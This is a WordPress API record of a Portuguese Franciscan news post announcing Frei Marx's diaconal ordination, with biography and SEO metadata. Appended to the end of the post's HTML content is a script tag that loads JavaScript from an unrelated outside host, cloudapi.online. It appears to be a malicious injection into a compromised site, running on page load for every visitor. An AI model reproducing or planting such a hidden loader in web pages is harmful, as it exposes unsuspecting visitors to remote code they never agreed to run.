{"id":153489,"date":"2018-03-05T11:05:03","date_gmt":"2018-03-05T14:05:03","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=153489"},"modified":"2019-04-17T12:19:38","modified_gmt":"2019-04-17T15:19:38","slug":"frei-marx-sera-ordenado-diacono-no-dia-11","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html","title":{"rendered":"Frei Marx ser\u00e1  ordenado di\u00e1cono em S\u00e3o Paulo"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"aligncenter size-full wp-image-153567\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg\" alt=\"ordena\u00e7\u00e3o_marx_050318\" width=\"830\" height=\"500\" \/><\/p>\n<p><em>\u201cPermanecei no meu amor\u201d<\/em> (Jo 15,9b). Este \u00e9 o lema escolhido Frei Marx Rodrigues dos Reis para receber o primeiro grau do Sacramento da Ordem, o diaconato, no dia 11 de mar\u00e7o de 2018, \u00e0s 10h30, no Convento S\u00e3o Francisco, em S\u00e3o Paulo (SP). Ele ser\u00e1 ordenado por Dom Eduardo Vieira dos Santos, bispo auxiliar de S\u00e3o Paulo.<\/p>\n<p>Filho de Helo\u00edza e Marco Aur\u00e9lio Ribeiro dos Reis, Frei Marx nasceu em S\u00e3o Jo\u00e3o de Meriti (RJ) no dia 28 de setembro de 1989. Tem duas irm\u00e3s: Amanda Rodrigues dos Reis (33 anos) e Yolanda Rodrigues dos Reis (30 anos). Ingressou no Aspirantado de Ituporanga em 2008 e vestiu o h\u00e1bito franciscano em 2010. Cursou Filosofia e Teologia e atualmente reside no Convento S\u00e3o Francisco, onde est\u00e1 a servi\u00e7o da Anima\u00e7\u00e3o Vocacional Provincial.<\/p>\n<p>Para Frei Marx, ser di\u00e1cono hoje \u00e9 estar atento ao clamor dos povos para se fazer presen\u00e7a de Cristo. \u201cJ\u00e1 na origem do diaconato, descrita em Atos dos Ap\u00f3stolos 6, 1-7, \u00e9 narrada aos irm\u00e3os, a necessidade de servir de modo mais espec\u00edfico as vi\u00favas e a mesa do Senhor. Assim, \u00e9 preciso entender que o servi\u00e7o prestado faz eco \u00e0s necessidades das pessoas. Hoje, essas vi\u00favas s\u00e3o tamb\u00e9m os empobrecidos, os ribeirinhos, os jovens aliciados pelo poder do tr\u00e1fico, os negros discriminados e todos os pequeninos de nosso tempo\u201d, acredita. Para ele, sem o desejo de ser servidor n\u00e3o h\u00e1 fidelidade ao que se abra\u00e7a.<\/p>\n<p>O futuro di\u00e1cono explica a escolha do seu lema: \u201cPara estar unido a Deus \u00e9 preciso estar no amor de Deus. Ao mesmo tempo \u00e9 preciso entender que Cristo amou o mundo de tal modo que as suas atitudes como um todo revelam a sua forma de amar, e porque foi amor profundo, a cruz veio como consequ\u00eancia. A cruz de Cristo \u00e9 consequ\u00eancia de um amor que n\u00e3o tem limites. Deus \u00e9 amor e nos criou para o amor. Assim, seu desejo \u00e9 que todos, sem exce\u00e7\u00e3o, sejam nutridos nesse amor, um amor que desejo servir por toda a vida\u201d, explicou.<\/p>\n<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/03\/Marx-convite.jpg\"><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/03\/Marx-convite.jpg\" alt=\"Marx-convite\" width=\"830\" height=\"469\" \/><\/a><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ordena\u00e7\u00e3o diaconal<\/p>\n","protected":false},"author":1,"featured_media":202522,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[275],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Ordena\u00e7\u00e3o diaconal\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-03-05T14:05:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-17T15:19:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html\",\"name\":\"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#primaryimage\"},\"datePublished\":\"2018-03-05T14:05:03+00:00\",\"dateModified\":\"2019-04-17T15:19:38+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html","og_locale":"pt_BR","og_type":"article","og_title":"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos","og_description":"Ordena\u00e7\u00e3o diaconal","og_url":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-03-05T14:05:03+00:00","article_modified_time":"2019-04-17T15:19:38+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/03\/ordena\u00e7\u00e3o_marx_050318.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html","name":"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#primaryimage"},"datePublished":"2018-03-05T14:05:03+00:00","dateModified":"2019-04-17T15:19:38+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-marx-sera-ordenado-diacono-no-dia-11.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Frei Marx ser\u00e1 ordenado di\u00e1cono em S\u00e3o Paulo"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/153489"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=153489"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/153489\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/202522"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=153489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=153489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=153489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}